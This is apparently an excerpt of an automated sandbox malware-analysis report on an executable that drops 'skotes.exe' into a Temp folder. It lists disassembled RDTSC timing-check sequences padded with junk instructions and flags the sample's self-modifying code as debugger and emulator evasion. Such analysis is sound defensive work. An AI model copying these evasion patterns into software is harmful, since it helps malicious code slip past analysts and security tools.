                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D40177 second address: 4D40191 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D40191 second address: 4D40195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D40195 second address: 4D401A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FCFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D401A8 second address: 4D40207 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebx, dword ptr [ebp+10h] 0x0000000d jmp 00007F0EC4502027h 0x00000012 xchg eax, esi 0x00000013 jmp 00007F0EC4502026h 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F0EC450201Ch 0x00000022 or ecx, 458964F8h 0x00000028 jmp 00007F0EC450201Bh 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D40207 second address: 4D40217 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D40217 second address: 4D4021B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D4021B second address: 4D40221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D40221 second address: 4D40226 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D40226 second address: 4D4022C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D4022C second address: 4D40255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov esi, dword ptr [ebp+08h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ch, bl 0x0000000f call 00007F0EC4502028h 0x00000014 pop eax 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D40255 second address: 4D4029E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FD0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F0EC4CB7FD0h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F0EC4CB7FCCh 0x00000018 call 00007F0EC4CB7FD2h 0x0000001d pop esi 0x0000001e popad 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D4029E second address: 4D40326 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, ecx 0x00000005 pushfd 0x00000006 jmp 00007F0EC450201Ah 0x0000000b add si, 08D8h 0x00000010 jmp 00007F0EC450201Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, edi 0x0000001a jmp 00007F0EC4502026h 0x0000001f test esi, esi 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F0EC450201Eh 0x00000028 and si, 7A68h 0x0000002d jmp 00007F0EC450201Bh 0x00000032 popfd 0x00000033 mov edi, eax 0x00000035 popad 0x00000036 je 00007F0F36C5032Ch 0x0000003c pushad 0x0000003d mov edx, ecx 0x0000003f popad 0x00000040 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007F0EC4502024h 0x0000004e rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D40326 second address: 4D4032C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D4032C second address: 4D4035C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC450201Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F0F36C50302h 0x00000011 jmp 00007F0EC450201Eh 0x00000016 mov edx, dword ptr [esi+44h] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D4035C second address: 4D40360 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D40360 second address: 4D40366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D40366 second address: 4D403BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0EC4CB7FD2h 0x00000009 sbb cx, DCB8h 0x0000000e jmp 00007F0EC4CB7FCBh 0x00000013 popfd 0x00000014 jmp 00007F0EC4CB7FD8h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c or edx, dword ptr [ebp+0Ch] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 jmp 00007F0EC4CB7FCDh 0x00000027 push ecx 0x00000028 pop ebx 0x00000029 popad 0x0000002a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D403BE second address: 4D40403 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC450201Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f jmp 00007F0EC450201Eh 0x00000014 jne 00007F0F36C502BBh 0x0000001a jmp 00007F0EC4502020h 0x0000001f test byte ptr [esi+48h], 00000001h 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D40403 second address: 4D40407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D40407 second address: 4D40424 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4502029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D40424 second address: 4D4042A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D4042A second address: 4D4046B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F0F36C50285h 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F0EC4502025h 0x00000015 and esi, 6744A4D6h 0x0000001b jmp 00007F0EC4502021h 0x00000020 popfd 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D3076A second address: 4D307A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 pushfd 0x00000006 jmp 00007F0EC4CB7FCDh 0x0000000b and ch, 00000036h 0x0000000e jmp 00007F0EC4CB7FD1h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F0EC4CB7FCDh 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D307A5 second address: 4D307F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0EC4502027h 0x00000008 pushfd 0x00000009 jmp 00007F0EC4502028h 0x0000000e add ax, 1EE8h 0x00000013 jmp 00007F0EC450201Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D307F2 second address: 4D307F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D307F8 second address: 4D307FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D307FD second address: 4D30803 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D30803 second address: 4D30807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D30807 second address: 4D30843 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0EC4CB7FD8h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D30843 second address: 4D30852 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC450201Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D30852 second address: 4D308FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov eax, 0D317113h 0x00000011 push esi 0x00000012 mov edx, 723CC15Ah 0x00000017 pop edx 0x00000018 popad 0x00000019 and esp, FFFFFFF8h 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F0EC4CB7FCCh 0x00000023 and si, DB98h 0x00000028 jmp 00007F0EC4CB7FCBh 0x0000002d popfd 0x0000002e mov bx, ax 0x00000031 popad 0x00000032 xchg eax, ebx 0x00000033 pushad 0x00000034 jmp 00007F0EC4CB7FD0h 0x00000039 popad 0x0000003a push eax 0x0000003b pushad 0x0000003c pushfd 0x0000003d jmp 00007F0EC4CB7FD8h 0x00000042 xor eax, 64ACE058h 0x00000048 jmp 00007F0EC4CB7FCBh 0x0000004d popfd 0x0000004e popad 0x0000004f xchg eax, ebx 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F0EC4CB7FD5h 0x00000057 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D308FE second address: 4D30923 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4502021h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0EC450201Dh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D30923 second address: 4D30933 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0EC4CB7FCCh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D30933 second address: 4D30976 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC450201Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F0EC4502029h 0x00000011 xchg eax, esi 0x00000012 jmp 00007F0EC450201Eh 0x00000017 mov esi, dword ptr [ebp+08h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D30976 second address: 4D3097A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D3097A second address: 4D30997 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4502029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D30997 second address: 4D3099D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D3099D second address: 4D309BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0EC450201Eh 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D309BC second address: 4D309CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D309CB second address: 4D309D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D309D0 second address: 4D309E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e movzx eax, di 0x00000011 movsx edi, ax 0x00000014 popad 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D309E5 second address: 4D309EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D309EB second address: 4D30A24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F0F3740D961h 0x0000000e jmp 00007F0EC4CB7FD5h 0x00000013 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001a pushad 0x0000001b mov al, 2Bh 0x0000001d mov dx, 589Ch 0x00000021 popad 0x00000022 mov ecx, esi 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 mov esi, ebx 0x00000029 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D30A24 second address: 4D30A84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4502023h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 movzx eax, bx 0x0000000c popad 0x0000000d je 00007F0F36C5797Ah 0x00000013 pushad 0x00000014 mov ecx, ebx 0x00000016 pushfd 0x00000017 jmp 00007F0EC450201Dh 0x0000001c sbb si, 8856h 0x00000021 jmp 00007F0EC4502021h 0x00000026 popfd 0x00000027 popad 0x00000028 test byte ptr [77516968h], 00000002h 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F0EC450201Dh 0x00000036 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D30A84 second address: 4D30AD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F0F3740D8E3h 0x0000000f jmp 00007F0EC4CB7FCEh 0x00000014 mov edx, dword ptr [ebp+0Ch] 0x00000017 pushad 0x00000018 pushad 0x00000019 mov cx, 1B33h 0x0000001d call 00007F0EC4CB7FD8h 0x00000022 pop ecx 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 mov bh, DEh 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D30AD4 second address: 4D30AD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D30AD8 second address: 4D30B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebx 0x00000008 pushad 0x00000009 push eax 0x0000000a movsx edx, ax 0x0000000d pop ecx 0x0000000e pushfd 0x0000000f jmp 00007F0EC4CB7FCDh 0x00000014 sbb ax, 2DD6h 0x00000019 jmp 00007F0EC4CB7FD1h 0x0000001e popfd 0x0000001f popad 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F0EC4CB7FCCh 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D30B1B second address: 4D30B86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0EC4502021h 0x00000009 xor al, FFFFFFE6h 0x0000000c jmp 00007F0EC4502021h 0x00000011 popfd 0x00000012 call 00007F0EC4502020h 0x00000017 pop eax 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebx 0x0000001c jmp 00007F0EC4502021h 0x00000021 xchg eax, ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 call 00007F0EC4502023h 0x0000002a pop ecx 0x0000002b pushad 0x0000002c popad 0x0000002d popad 0x0000002e rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D30B86 second address: 4D30BBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 2752F971h 0x00000008 mov ebx, esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F0EC4CB7FD4h 0x00000017 and ah, 00000078h 0x0000001a jmp 00007F0EC4CB7FCBh 0x0000001f popfd 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D30BBD second address: 4D30BC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D30C7C second address: 4D30C80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D30C80 second address: 4D30C9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4502029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D40D7F second address: 4D40D85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D40D85 second address: 4D40DB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F0EC450201Eh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F0EC4502020h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D40DB5 second address: 4D40DB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D40DB9 second address: 4D40DD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4502029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D40DD6 second address: 4D40DE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0EC4CB7FCCh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D40DE6 second address: 4D40DEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D40DEA second address: 4D40DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c mov ecx, ebx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4DC06FB second address: 4DC0701 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4DC0701 second address: 4DC0705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4DC0705 second address: 4DC0709 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4DC0709 second address: 4DC074F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a movzx eax, bx 0x0000000d jmp 00007F0EC4CB7FCFh 0x00000012 popad 0x00000013 mov dword ptr [esp], ebp 0x00000016 jmp 00007F0EC4CB7FD6h 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F0EC4CB7FCAh 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4DC074F second address: 4DC075E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC450201Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4DB0A95 second address: 4DB0AA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0EC4CB7FCCh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4DB090F second address: 4DB0913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4DB0913 second address: 4DB092D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4DB092D second address: 4DB0933 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4DB0933 second address: 4DB0937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4DB0937 second address: 4DB093B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4DB093B second address: 4DB0974 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov esi, edx 0x0000000c jmp 00007F0EC4CB7FCBh 0x00000011 popad 0x00000012 mov ebp, esp 0x00000014 pushad 0x00000015 jmp 00007F0EC4CB7FD4h 0x0000001a mov esi, 24A6B1A1h 0x0000001f popad 0x00000020 pop ebp 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                    Tries to evade debugger and weak emulator (self modifying code)
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSpecial instruction interceptor: First address: B6C6EE instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSpecial instruction interceptor: First address: D45B33 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSpecial instruction interceptor: First address: B6EF9F instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSpecial instruction interceptor: First address: D255CC instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSpecial instruction interceptor: First address: DA55CE instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: C3C6EE instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: E15B33 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: C3EF9F instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: DF55CC instructions caused by: Self-modifying code
